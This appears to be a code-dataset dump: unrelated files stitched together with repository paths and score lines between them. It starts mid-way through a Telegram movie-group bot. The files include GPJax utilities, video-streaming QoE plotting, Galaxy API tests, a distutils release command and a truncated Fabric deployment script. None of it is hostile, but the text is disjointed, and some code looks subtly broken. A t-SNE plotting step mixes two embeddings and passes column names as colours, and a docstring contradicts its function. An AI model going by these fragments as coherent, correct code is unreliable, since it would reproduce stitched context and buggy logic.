"SHARE OUR GROUP 🖤🤙", url="http://t.me/share/url?url=Hey%20There%E2%9D%A4%EF%B8%8F%2C%0A%20%0A%20I%20Found%20A%20Really%20Awesome%20Group%20%20For%20Searching%20Movies%20Hope%20You%20will%20Join%20This%20Group%20Too😁😁👍%E2%9D%A4%EF%B8%8F%E2%9D%A4%EF%B8%8F%E2%9D%A4%EF%B8%8F%0A%20%0A%20Group%20Sharing%20Username%20Link%20%3A-%20%40REQUEST_M0viz")
]
]
),
reply_to_message_id=message.message_id
)
except:
pass
| 2.34375 | 2 |
gpjax/utils.py | thomaspinder/GPJax | 44 | 17631 | from copy import deepcopy
from typing import Tuple
import jax.numpy as jnp
from jax.scipy.linalg import cho_factor, cho_solve
from multipledispatch import dispatch
from .types import Array
def I(n: int) -> Array:
"""
Compute an n x n identity matrix.
:param n: The size of of the matrix.
:return: An n x n identity matrix.
"""
return jnp.eye(n)
def concat_dictionaries(a: dict, b: dict) -> dict:
"""
Append one dictionary below another. If duplicate keys exist, then the key-value pair of the second supplied
dictionary will be used.
"""
return {**a, **b}
def merge_dictionaries(base_dict: dict, in_dict: dict) -> dict:
"""
This will return a complete dictionary based on the keys of the first matrix. If the same key should exist in the
second matrix, then the key-value pair from the first dictionary will be overwritten. The purpose of this is that
the base_dict will be a complete dictionary of values such that an incomplete second dictionary can be used to
update specific key-value pairs.
:param base_dict: Complete dictionary of key-value pairs.
:param in_dict: Subset of key-values pairs such that values from this dictionary will take precedent.
:return: A merged single dictionary.
"""
for k, v in base_dict.items():
if k in in_dict.keys():
base_dict[k] = in_dict[k]
return base_dict
def sort_dictionary(base_dict: dict) -> dict:
"""
Sort a dictionary based on the dictionary's key values.
:param base_dict: The unsorted dictionary.
:return: A dictionary sorted alphabetically on the dictionary's keys.
"""
return dict(sorted(base_dict.items()))
@dispatch(jnp.DeviceArray)
def standardise(x: jnp.DeviceArray) -> Tuple[jnp.DeviceArray, jnp.DeviceArray, jnp.DeviceArray]:
"""
Standardise a given matrix such that values are distributed according to a unit normal random variable. This is
primarily designed for standardising a training dataset.
:param x: A matrix of unstandardised values
:return: A matrix of standardised values
"""
xmean = jnp.mean(x, axis=0)
xstd = jnp.std(x, axis=0)
return (x - xmean) / xstd, xmean, xstd
@dispatch(jnp.DeviceArray, jnp.DeviceArray, jnp.DeviceArray)
def standardise(
x: jnp.DeviceArray, xmean: jnp.DeviceArray, xstd: jnp.DeviceArray
) -> jnp.DeviceArray:
"""
Standardise a given matrix with respect to a given mean and standard deviation. This is primarily designed for
standardising a test set of data with respect to the training data.
:param x: A matrix of unstandardised values
:param xmean: A precomputed mean vector
:param xstd: A precomputed standard deviation vector
:return: A matrix of standardised values
"""
return (x - xmean) / xstd
def unstandardise(
x: jnp.DeviceArray, xmean: jnp.DeviceArray, xstd: jnp.DeviceArray
) -> jnp.DeviceArray:
"""
Unstandardise a given matrix with respect to a previously computed mean and standard deviation. This is designed
for remapping a matrix back onto its original scale.
:param x: A standardised matrix.
:param xmean: A mean vector.
:param xstd: A standard deviation vector.
:return: A matrix of unstandardised values.
"""
return (x * xstd) + xmean
def as_constant(parameter_set: dict, params: list) -> Tuple[dict, dict]:
base_params = deepcopy(parameter_set)
sparams = {}
for param in params:
sparams[param] = base_params[param]
del base_params[param]
return base_params, sparams
| 2.65625 | 3 |
tools/replace_version.py | jasmcaus/image-deep-learning-keras | 681 | 17632 | import os
def replace_version(old_version, new_version):
if not isinstance(old_version, tuple) or not isinstance(new_version, tuple):
raise ValueError("`old_version` and `new_version` must be a version tuple. Eg: (1.2.3)")
major, minor, micro = old_version[:3]
old_version = f'{major}.{minor}.{micro}'
major, minor, micro = new_version[:3]
new_version = f'{major}.{minor}.{micro}'
print(f"New version = {new_version}")
for root, _, files in os.walk('../caer'):
for file in files:
if file.endswith(('.py', '.cpp', '.c', '.h', '.hpp')):
with open(os.path.abspath(os.path.join(root, file)), 'r') as f:
new_text = f.read().replace('version ' + old_version, 'version ' + new_version)
with open(os.path.abspath(os.path.join(root, file)), 'w') as f:
print(os.path.abspath(os.path.join(root, file)))
f.write(new_text)
replace_version((1,8,0), (3,9,1))
| 3.125 | 3 |
DashExperiments/make_plot.py | magruener/reconstructing-proprietary-video-streaming-algorithms | 9 | 17633 | import argparse
import math
import matplotlib.pyplot as plt
import os
import numpy as np
import shutil
import pandas as pd
import seaborn as sns
sns.set()
sns.set_context("talk")
NUM_BINS = 100
path = '../Data/Video_Info/Pensieve_Info/PenieveVideo_video_info'
video_mappings = {}
video_mappings['300'] = '320x180x30_vmaf_score'
video_mappings['750'] = '640x360x30_vmaf_score'
video_mappings['1200'] = '768x432x30_vmaf_score'
video_mappings['1850'] = '1024x576x30_vmaf_score'
video_mappings['2850'] = '1280x720x30_vmaf_score'
video_mappings['4300'] = '1280x720x60_vmaf_score'
metric_list = ["reward_vmaf", "reward_br", "rebuf", "br_avg", "vmaf_avg", "switching_vmaf", "switching_br"]
#MINERVA
rebuf_penalty = 25
switching_penalty = 2.5
segment_lenght = 4.0
def load_csv():
video_info = pd.read_csv(path)
return video_info
pensieve_video_csv = load_csv()
def get_qoe(abr, trace):
logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
logfile = os.path.join(logdir, abr + "_rewards_0.log")
reward_vmaf = 0
reward_bitrate = 0
total_rebuffering = 0.0
vmaf_avg = 0.0
vmaf_switching_avg = 0.0
bitrate_avg = 0.0
bitrate_switching_avg = 0.0
with open(logfile, "r") as fin:
reward_lines = fin.readlines()
if (len(reward_lines) != args.video_chunks):
if len(reward_lines) < args.video_chunks:
to_clean.append(logfile)
print("{} has {} chunks instead of {}".format(logfile, len(reward_lines), args.video_chunks))
print("Skip, please")
return None, None, None, None, None, None, None
for i, r_line in enumerate(reward_lines):
data = r_line.split()
if i == 0:
br = int(data[1])
br_previous = br
vmaf_previous = pensieve_video_csv.loc[i, video_mappings[str(br)]]
else: # skip first
br = int(data[1])
bitrate_avg += br
bitrate_switching_avg += abs(br - br_previous)
reward_bitrate += float(data[-1])
total_rebuffering += float(data[3])
vmaf_current = pensieve_video_csv.loc[i, video_mappings[str(br)]]
vmaf_avg += vmaf_current
vmaf_switching_avg += abs(vmaf_current - vmaf_previous)
reward_vmaf += (float(vmaf_current) -
rebuf_penalty*(float(data[3])) -
switching_penalty*(abs(vmaf_current - vmaf_previous)))
vmaf_previous = vmaf_current
br_previous = br
return reward_vmaf,\
reward_bitrate,\
total_rebuffering,\
bitrate_switching_avg/(segment_lenght*args.video_chunks),\
vmaf_switching_avg/(segment_lenght*args.video_chunks),\
vmaf_avg/(segment_lenght*args.video_chunks),\
bitrate_avg/args.video_chunks
#
#def get_qoe(abr, trace):
# logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
# logfile = os.path.join(logdir, abr + "_rewards_0.log")
#
# reward = 0
#
#
# with open(logfile, "r") as fin:
# reward_lines = fin.readlines()
#
# if (len(reward_lines) != args.video_chunks):
# if len(reward_lines) < args.video_chunks:
# to_clean.append(logfile)
# print("{} has {} chunks instead of {}".format(logfile, len(reward_lines), args.video_chunks))
# print("Skip, please")
# return None
#
# for i, r_line in enumerate(reward_lines):
# if i > 0: # skip first
# reward += float(r_line.split()[-1])
#
# return reward
def get_qoes(abrs_list, traces_list):
global_results = {}
for abr in abrs_list:
global_results[abr] = []
global_results[abr] = {}
global_results[abr]['reward_vmaf'] = []
global_results[abr]['reward_br'] = []
global_results[abr]['rebuf'] = []
global_results[abr]['switching_br'] = []
global_results[abr]['switching_vmaf'] = []
global_results[abr]['vmaf_avg'] = []
global_results[abr]['br_avg'] = []
for trace in traces_list:
reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)
if reward_vmaf is not None:
global_results[abr]['reward_vmaf'].append(reward_vmaf)
global_results[abr]['reward_br'].append(reward_br)
global_results[abr]['rebuf'].append(rebuf)
global_results[abr]['switching_br'].append(switching_br)
global_results[abr]['switching_vmaf'].append(switching_vmaf)
global_results[abr]['vmaf_avg'].append(vmaf_avg)
global_results[abr]['br_avg'].append(br_avg)
return global_results
def get_qoes_partial(abrs_list, traces_list):
total_experiments_expected = len(args.abrs) * len(args.traces)
experiments_executed_so_far = 0
partial_results = {}
for abr in abrs_list:
partial_results[abr] = {}
partial_results[abr]['reward_vmaf'] = []
partial_results[abr]['reward_br'] = []
partial_results[abr]['rebuf'] = []
partial_results[abr]['switching_br'] = []
partial_results[abr]['switching_vmaf'] = []
partial_results[abr]['vmaf_avg'] = []
partial_results[abr]['br_avg'] = []
for trace in traces_list:
logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
if os.path.exists(logdir):
reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)
if reward_vmaf is not None:
partial_results[abr]['reward_vmaf'].append(reward_vmaf)
partial_results[abr]['reward_br'].append(reward_br)
partial_results[abr]['rebuf'].append(rebuf)
partial_results[abr]['switching_br'].append(switching_br)
partial_results[abr]['switching_vmaf'].append(switching_vmaf)
partial_results[abr]['vmaf_avg'].append(vmaf_avg)
partial_results[abr]['br_avg'].append(br_avg)
experiments_executed_so_far += 1
if partial_results[abr] == []:
del partial_results[abr]
print("Experiment executed: {}/{}".format(experiments_executed_so_far, total_experiments_expected))
return partial_results
def plot_cdf(results, reward_key):
fig = plt.figure(figsize=(16.0, 10.0))
ax = fig.add_subplot(111)
def average_of_the_best():
avg_best = -1000000000000
abr_best = ''
for scheme in results.keys():
avg_tmp = np.mean(results[scheme][reward_key])
if avg_best < avg_tmp:
avg_best = avg_tmp
abr_best = scheme
print("Best provider in average is {} with {}".format(abr_best, avg_best))
return abs(avg_best)
schemes = []
norm = average_of_the_best()
markers = ['.', ',', 'o', 'v', '^', '>', '<', 's', 'x', 'D', 'd', '*', '_', '']
for i, scheme in enumerate(results.keys()):
values = [float(i)/norm for i in results[scheme][reward_key]]
values, base = np.histogram(values, bins=len(values))
cumulative = np.cumsum(values)
cumulative = [float(i) / len(values) * 100 for i in cumulative]
marker_index = i % len(markers)
ax.plot(base[:-1], cumulative, linewidth=3, marker=markers[marker_index], markevery=2, markersize=15)
schemes.append(scheme)
ax.legend(schemes, loc=2)
ax.set_xlim(-1.0, 1.8)
plt.ylabel('CDF')
plt.xlabel('total reward')
fig.savefig(os.path.join(args.store_dir, 'cdf_{}.png'.format(reward_key)))
def plot_bar(results, metric):
results_metric_avg = {}
for scheme in results.keys():
results_metric_avg[scheme] = np.mean(results[scheme][metric])
fig = plt.figure(figsize=(16.0, 10.0))
ax = fig.add_subplot(111)
y_pos = np.arange(len(results_metric_avg.keys()))
ax.bar(y_pos, results_metric_avg.values())
ax.set_xticks(y_pos)
ax.set_xticklabels(results_metric_avg.keys())
fig.savefig(os.path.join(args.store_dir, 'bar_{}.png'.format(metric)))
def clean():
timestamps = []
for c in to_clean:
timestamp_creation = os.path.getmtime(c)
timestamps.append(timestamp_creation)
print("File {} was created at {}".format(c, timestamp_creation))
timestamps.sort()
if not args.include_last and len(timestamps) >= 1:
print("Skipping file created at {}: might be still running".format(timestamps[-1]))
del timestamps[-1]
removing = []
for t in timestamps:
for c in to_clean:
if os.path.getmtime(c) == t:
print("Removing {}".format(os.path.dirname(os.path.dirname(c))))
removing.append(os.path.dirname(os.path.dirname(c)))
for r in removing:
shutil.rmtree(r)
def main():
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('result_dir', help='result directory', type=str)
parser.add_argument('store_dir', help='result directory', type=str)
parser.add_argument('video_chunks', help='result directory', type=int)
parser.add_argument("--abrs", nargs="+", help='ABR list')
parser.add_argument("--traces", nargs="+", help='Traces list')
parser.add_argument('--partial', action="store_true", help="get the partial results")
parser.add_argument('--allow_cleaning', action="store_true", help="if enabled, cleans the experiments that failed, a part of the most recent one (might still be running")
parser.add_argument('--include_last', action="store_true", help="if enabled, also the last is getting cleaned")
# args need to be global for simplicity
global args
args = parser.parse_args()
global to_clean
to_clean = []
if not os.path.exists(args.store_dir):
os.makedirs(args.store_dir)
if args.partial:
res = get_qoes_partial(args.abrs, args.traces)
else:
res = get_qoes(args.abrs, args.traces)
for metric in metric_list:
if "reward" in metric:
plot_cdf(res, metric)
plot_bar(res, metric)
if args.allow_cleaning:
print("Executing cleaning")
clean()
if __name__ == "__main__":
main()
| 2.109375 | 2 |
aiopoke/objects/utility/common_models/encounter.py | beastmatser/aiopokeapi | 3 | 17634 | from typing import TYPE_CHECKING, Any, Dict, List
from aiopoke.utils.minimal_resources import MinimalResource
from aiopoke.utils.resource import Resource
if TYPE_CHECKING:
from aiopoke.objects.resources import EncounterConditionValue, EncounterMethod
class Encounter(Resource):
min_level: int
max_level: int
condition_values: List[MinimalResource["EncounterConditionValue"]]
chance: int
method: MinimalResource["EncounterMethod"]
def __init__(
self,
*,
min_level: int,
max_level: int,
condition_values: List[Dict[str, Any]],
chance: int,
method: Dict[str, Any],
):
self.min_level = min_level
self.max_level = max_level
self.condition_values = [
MinimalResource(**condition_value) for condition_value in condition_values
]
self.chance = chance
self.method = MinimalResource(**method)
| 2.515625 | 3 |
2015/solutions/day1.py | rsizem2/aoc_2020 | 0 | 17635 |
def read_file(test = True):
if test:
filename = '../tests/day1.txt'
else:
filename = '../input/day1.txt'
with open(filename) as file:
temp = list()
for line in file:
temp.append(line.strip())
return temp
def puzzle1():
temp = read_file(False)[0]
floor = 0
for char in temp:
if char == '(':
floor += 1
elif char == ')':
floor -= 1
else:
raise ValueError
print(floor)
def puzzle2():
temp = read_file(False)[0]
floor = 0
for i, char in enumerate(temp, start = 1):
if char == '(':
floor += 1
elif char == ')':
floor -= 1
else:
raise ValueError
if floor == -1:
break
print(i)
puzzle1()
puzzle2() | 3.515625 | 4 |
setup.py | Kamuish/StarSearch | 0 | 17636 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
setup(name='starsearch',
version='0.3',
description='Package to dig into the ESO archives',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
url='https://github.com/jdavidrcamacho/starsearch',
packages=['starsearch'],
install_requires=[
'numpy',
'astroquery',
"astropy",
],
)
| 0.980469 | 1 |
test/integration/test_genomes.py | beatrizserrano/galaxy | 0 | 17637 | import os
import tempfile
from unittest.mock import patch
from galaxy.exceptions import (
ObjectNotFound,
ReferenceDataError,
)
from galaxy_test.driver import integration_util
BUILDS_DATA = (
"?\tunspecified (?)",
"hg_test\tdescription of hg_test",
"hg_test_nolen\tdescription of hg_test_nolen",
)
LEN_DATA = (
"chr1\t248956422",
"chr2\t242193529",
"chr3\t198295559",
)
def get_key(has_len_file=True):
pos = 1 if has_len_file else 2
return BUILDS_DATA[pos].split("\t")[0]
class GenomesTestCase(integration_util.IntegrationTestCase):
@classmethod
def handle_galaxy_config_kwds(cls, config):
genomes_dir = cls.temp_config_dir("test_genomes")
os.makedirs(genomes_dir)
cls._setup_builds_file(config, genomes_dir)
cls._setup_len_file(config, genomes_dir)
@classmethod
def _setup_builds_file(cls, config, genomes_dir):
"""Create builds file + set config option."""
builds_file_path = os.path.join(genomes_dir, "builds.txt")
config["builds_file_path"] = builds_file_path
with open(builds_file_path, "w") as f:
f.write("\n".join(BUILDS_DATA))
@classmethod
def _setup_len_file(cls, config, genomes_dir):
"""Create len file + set config option."""
config["len_file_path"] = genomes_dir # the config option is a dir
key = get_key()
len_file_path = os.path.join(genomes_dir, f"{key}.len")
with open(len_file_path, "w") as f:
f.write("\n".join(LEN_DATA))
def test_index(self):
response = self._get("genomes")
self._assert_status_code_is(response, 200)
rval = response.json()
expected_data = [item.split("\t")[::-1] for item in BUILDS_DATA]
assert rval == expected_data
def test_show_valid(self):
key = get_key()
response = self._get(f"genomes/{key}")
self._assert_status_code_is(response, 200)
rval = response.json()
assert rval["id"] == key
assert len(rval["chrom_info"]) == len(LEN_DATA)
def test_show_valid_no_refdata(self):
key = get_key(has_len_file=False)
response = self._get(f"genomes/{key}")
self._assert_status_code_is(response, 500)
assert response.json()["err_code"] == ReferenceDataError.err_code.code
def test_show_invalid(self):
response = self._get("genomes/invalid")
self._assert_status_code_is(response, 404)
assert response.json()["err_code"] == ObjectNotFound.err_code.code
def test_sequences(self):
class RefDataMock:
sequence = "test-value"
key = get_key()
with patch.object(self._app.genomes, "has_reference_data", return_value=True), patch.object(
self._app.genomes, "_get_reference_data", return_value=RefDataMock()
):
response = self._get(f"genomes/{key}/sequences")
self._assert_status_code_is(response, 200)
assert response.content == bytes(RefDataMock.sequence, "utf-8")
def test_sequences_no_data(self):
key = get_key()
with patch.object(self._app.genomes, "has_reference_data", return_value=False):
response = self._get(f"genomes/{key}/sequences")
self._assert_status_code_is(response, 500)
assert response.json()["err_code"] == ReferenceDataError.err_code.code
def test_indexes(self):
mock_key, mock_content, index_type, suffix = "mykey", "mydata", "fasta_indexes", ".fai"
# write some data to a tempfile
with tempfile.NamedTemporaryFile(dir=self._tempdir, suffix=suffix, mode="w", delete=False) as tf:
tf.write(mock_content)
# make a mock containing the path to the tempfile
tmpfile_path = tf.name[: -len(suffix)] # chop off the extention
mock_data = [[mock_key, tmpfile_path]]
with patch.object(self._app.tool_data_tables.data_tables[index_type], "data", new=mock_data):
response = self._get(f"genomes/{mock_key}/indexes?type={index_type}")
self._assert_status_code_is(response, 200)
assert response.content == bytes(mock_content, "utf-8")
| 2.1875 | 2 |
examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | 0 | 17638 | import numpy as np
import pandas as pd
import os
from tqdm import tqdm
import pacmap
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import umap
def darius1(numberDirectory):
path = ""
if(numberDirectory == 1):
directorys = [
['training_setA/training/', 'p0']
]
if(numberDirectory == 2):
directorys = [
['training_setB/training/', 'p1']
]
if(numberDirectory == 3):
directorys = [
['training_setA/training/', 'p0'],
['training_setB/training/', 'p1']
]
dfs = []
for z, (directory, file_head) in enumerate(directorys):
for i, filename in enumerate(tqdm(os.listdir(path + directory))):
df_temp = pd.read_csv(path + directory + filename, skiprows=0, sep='|')
dfs.append(df_temp)
df = pd.concat(dfs)
#df_no_nan = df.dropna()
df_nan_zwero = df.replace(np.NaN, 0)
df_nan_zwero.head(n=50)
df_nan_none = df.replace(np.NaN, None)
df_nan_none.head(n=50)
df_nan_mean = df.fillna(df.mean())
df_nan_mean.head(n=50)
df_nan_none_2= df.where(pd.notnull(df), None)
df_nan_mean.head(n=50)
#df.shape
#df.head(n=80)
############################################################
# initializing the pacmap instance
# Setting n_neighbors to "None" leads to a default choice shown below in "parameter" section
embedding = pacmap.PaCMAP(n_dims=2, n_neighbors=None, MN_ratio=0.5, FP_ratio=2.0)
# fit the data (The index of transformed data corresponds to the index of the original data)
X_transformed = embedding.fit_transform(df_nan_none_2.values, init="pca")
# visualize the embedding
#fig, ax = plt.subplots(1, 1, figsize=(6, 6))
#ax.scatter(X_transformed[:, 0], X_transformed[:, 1], cmap="Spectral", s=0.6)
plt.scatter(X_transformed[:, 0], X_transformed[:, 1], cmap="Spectral")
plt.show()
#############################################################
X_embedded = TSNE(n_components=2, learning_rate='auto',init='random').fit_transform(df.values)
fig, ax = plt.subplots(1, 1, figsize=(6, 6))
ax.scatter(X_transformed[:, 0], X_embedded[:, 1], cmap="Spectral", c=list(df.columns), s=0.6)
############################################################# | 2.296875 | 2 |
release.py | jhofmann/yubiauth | 17 | 17639 | <filename>release.py
# Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from distutils import log
from distutils.core import Command
from distutils.errors import DistutilsSetupError
import os
import re
from datetime import date
class release(Command):
description = "create and release a new version"
user_options = [
('keyid', None, "GPG key to sign with"),
('skip-tests', None, "skip running the tests"),
('pypi', None, "publish to pypi"),
]
boolean_options = ['skip-tests', 'pypi']
def initialize_options(self):
self.keyid = None
self.skip_tests = 0
self.pypi = 0
def finalize_options(self):
self.cwd = os.getcwd()
self.fullname = self.distribution.get_fullname()
self.name = self.distribution.get_name()
self.version = self.distribution.get_version()
def _verify_version(self):
with open('NEWS', 'r') as news_file:
line = news_file.readline()
now = date.today().strftime('%Y-%m-%d')
if not re.search(r'Version %s \(released %s\)' % (self.version, now),
line):
raise DistutilsSetupError("Incorrect date/version in NEWS!")
def _verify_tag(self):
if os.system('git tag | grep -q "^%s\$"' % self.fullname) == 0:
raise DistutilsSetupError(
"Tag '%s' already exists!" % self.fullname)
def _sign(self):
if os.path.isfile('dist/%s.tar.gz.asc' % self.fullname):
# Signature exists from upload, re-use it:
sign_opts = ['--output dist/%s.tar.gz.sig' % self.fullname,
'--dearmor dist/%s.tar.gz.asc' % self.fullname]
else:
# No signature, create it:
sign_opts = ['--detach-sign', 'dist/%s.tar.gz' % self.fullname]
if self.keyid:
sign_opts.insert(1, '--default-key ' + self.keyid)
self.execute(os.system, ('gpg ' + (' '.join(sign_opts)),))
if os.system('gpg --verify dist/%s.tar.gz.sig' % self.fullname) != 0:
raise DistutilsSetupError("Error verifying signature!")
def _tag(self):
tag_opts = ['-s', '-m ' + self.fullname, self.fullname]
if self.keyid:
tag_opts[0] = '-u ' + self.keyid
self.execute(os.system, ('git tag ' + (' '.join(tag_opts)),))
def _do_call_publish(self, cmd):
self._published = os.system(cmd) == 0
def _publish(self):
web_repo = os.getenv('YUBICO_GITHUB_REPO')
if web_repo and os.path.isdir(web_repo):
artifacts = [
'dist/%s.tar.gz' % self.fullname,
'dist/%s.tar.gz.sig' % self.fullname
]
cmd = '%s/publish %s %s %s' % (
web_repo, self.name, self.version, ' '.join(artifacts))
self.execute(self._do_call_publish, (cmd,))
if self._published:
self.announce("Release published! Don't forget to:", log.INFO)
self.announce("")
self.announce(" (cd %s && git push)" % web_repo, log.INFO)
self.announce("")
else:
self.warn("There was a problem publishing the release!")
else:
self.warn("YUBICO_GITHUB_REPO not set or invalid!")
self.warn("This release will not be published!")
def run(self):
if os.getcwd() != self.cwd:
raise DistutilsSetupError("Must be in package root!")
self._verify_version()
self._verify_tag()
self.execute(os.system, ('git2cl > ChangeLog',))
if not self.skip_tests:
self.run_command('check')
# Nosetests calls sys.exit(status)
try:
self.run_command('nosetests')
except SystemExit as e:
if e.code != 0:
raise DistutilsSetupError("There were test failures!")
self.run_command('sdist')
if self.pypi:
cmd_obj = self.distribution.get_command_obj('upload')
cmd_obj.sign = True
if self.keyid:
cmd_obj.identity = self.keyid
self.run_command('upload')
self._sign()
self._tag()
self._publish()
self.announce("Release complete! Don't forget to:", log.INFO)
self.announce("")
self.announce(" git push && git push --tags", log.INFO)
self.announce("")
| 1.585938 | 2 |
fabfile.py | 8081594571/bgtools_web | 1 | 17640 | <gh_stars>1-10
# Credit goes to https://bitbucket.org/spookylukey/django-fabfile-starter/src
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
"""
Render and upload a template text file to a remote host.
"""
text = None
template_dir = template_dir or os.getcwd()
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
context = context if context is not None else {}
text = jenv.get_template(filename).render(**context)
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
# text = text.encode('utf-8')
# Upload the file.
return c.put(
StringIO(text),
destination,
)
def venv(c):
"""
Runs a command in a virtualenv (which has been specified using
the virtualenv context manager
"""
return c.prefix("source {}/bin/activate".format(c.config.bgtools.VENV_DIR))
def install_dependencies(c):
ensure_virtualenv(c)
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run("pip install -U -r requirements.txt")
def file_exists(c, path):
print('checking existence of: {}: {}'.format(path, bool(c.run('stat {}'.format(path), hide=True, warn=True))))
return c.run('stat {}'.format(path), hide=True, warn=True).ok
def ensure_virtualenv(c):
args = c.config.bgtools
ensure_dir(c, args.SRC_DIR)
if file_exists(c, args.VENV_DIR):
return
with c.cd(args.DJANGO_APP_ROOT):
c.run("virtualenv --no-site-packages --python={} {}".format(
args.PYTHON_BIN, args.venv_subdir))
c.run("echo {} > {}/lib/{}/site-packages/projectsource.pth".format(
args.SRC_DIR, args.venv_subdir, args.PYTHON_BIN))
def ensure_dir(c, d):
print('checking existence of {} on {}'.format(d, c))
if not file_exists(c, d):
# note that the parent directory needs to already exist, usually by making a custom app
# with the correct name in the webfaction control panel
print('making {}'.format(d))
c.run("mkdir -p {}".format(d))
def copy_settings(c):
args = c.config.bgtools
with c.cd(args.LOCAL_DIR):
fname = 'settings_{}.py'.format(args.mode)
c.local('cp {} bgtools/bgtools/private_settings.py'.format(fname))
c.local('echo STAGING={} >> bgtools/bgtools/private_settings.py'.format('True' if args.staging else False))
def rsync(c, src, dest):
args = c.config.bgtools
c.local('rsync -avz {} {}:{}'.format(src,
args.host,
dest))
def rsync_source(c):
"""
rsync the source over to the server
"""
args = c.config.bgtools
rsync(c, os.path.join(args.LOCAL_DIR, 'bgtools'), args.DJANGO_APP_ROOT)
def collect_static(c):
"""
Collect django static content on server
"""
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run('python manage.py collectstatic --no-input')
def checkout_and_install_libs(c):
args = c.config.bgtools
libs = json.load(open('libs.json'))
ensure_dir(c, args.CHECKOUT_DIR)
with c.cd(args.CHECKOUT_DIR):
for lib, params in libs.items():
print('handling ' + lib)
libdir = params['repo']
if libdir != 'local':
params['branch'] = args.branch
else:
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(params['path'], params['name']),
args.CHECKOUT_DIR)
with c.cd(params['name']), venv(c):
c.run('pip install -U .')
continue
github_url = 'https://github.com/{}/{}'.format(params['owner'], params['repo'])
if not file_exists(c, libdir):
c.run('git clone {}.git'.format(github_url))
with c.cd(libdir):
c.run('git fetch origin')
if args.mode == 'debug' or args.tag == 'head':
c.run('git checkout {}'.format(params['branch']))
c.run('git pull')
version = c.run('git rev-parse {}'.format(params['branch'])).stdout
version_url = '{}/commits/{}'.format(github_url, version)
elif args.mode == 'release':
tag = args.tag
if tag == 'latest':
tag = c.run('git tag -l "v*" --sort=-v:refname').stdout.split()[0]
c.run('git checkout {}'.format(tag))
version = tag
version_url = '{}/releases/tag/{}'.format(github_url, tag)
for src, target in params.get('extras', []):
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(args.LOCAL_DIR, 'extras', lib, src),
posixpath.join(args.CHECKOUT_DIR, libdir, target))
with venv(c):
c.run('pip install -U .')
with c.cd(args.SRC_DIR):
r = requests.get('https://api.github.com/repos/{}/{}/releases'.format(params['owner'],
params['repo']))
changelog = r.json()
changelog = [{'url': ch['html_url'],
'date': dt.datetime.strptime(ch['published_at'][:10], '%Y-%m-%d').date(),
'name': ch['name'],
'tag': ch['tag_name'],
'description': ch['body']}
for ch in changelog]
for tname, context in [('version', {'version': version, 'url': version_url}),
('changelog', {'changelog': changelog})]:
print('uploading {}_{}.html'.format(lib, tname))
upload_template(c, '{}_template.html'.format(tname),
posixpath.join(args.SRC_DIR,
DJANGO_APP_NAME,
'templates',
DJANGO_APP_NAME,
'{}_{}.html'.format(lib, tname)),
context=context,
template_dir=posixpath.join(args.LOCAL_DIR, 'templates'))
@fabric.task
def stop_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Stop the webserver that is running the Django instance
"""
populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
c.run("kill $(cat {})".format(c.config.bgtools.GUNICORN_PIDFILE))
def _webserver_command(c):
args = c.config.bgtools
return ('{venv_dir}/bin/gunicorn '
'--error-logfile={error_logfile} '
'--access-logfile={access_logfile} '
'--capture-output '
'-b 127.0.0.1:{port} '
'-D -w {workers} --pid {pidfile} '
'{wsgimodule}:application').format(
**{'venv_dir': args.VENV_DIR,
'pidfile': args.GUNICORN_PIDFILE,
'wsgimodule': args.WSGI_MODULE,
'port': APP_PORT if not args.staging else STAGING_APP_PORT,
'workers': GUNICORN_WORKERS,
'error_logfile': args.GUNICORN_ERROR_LOGFILE,
'access_logfile': args.GUNICORN_ACCESS_LOGFILE}
)
@fabric.task
def start_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Starts the webserver that is running the Django instance
"""
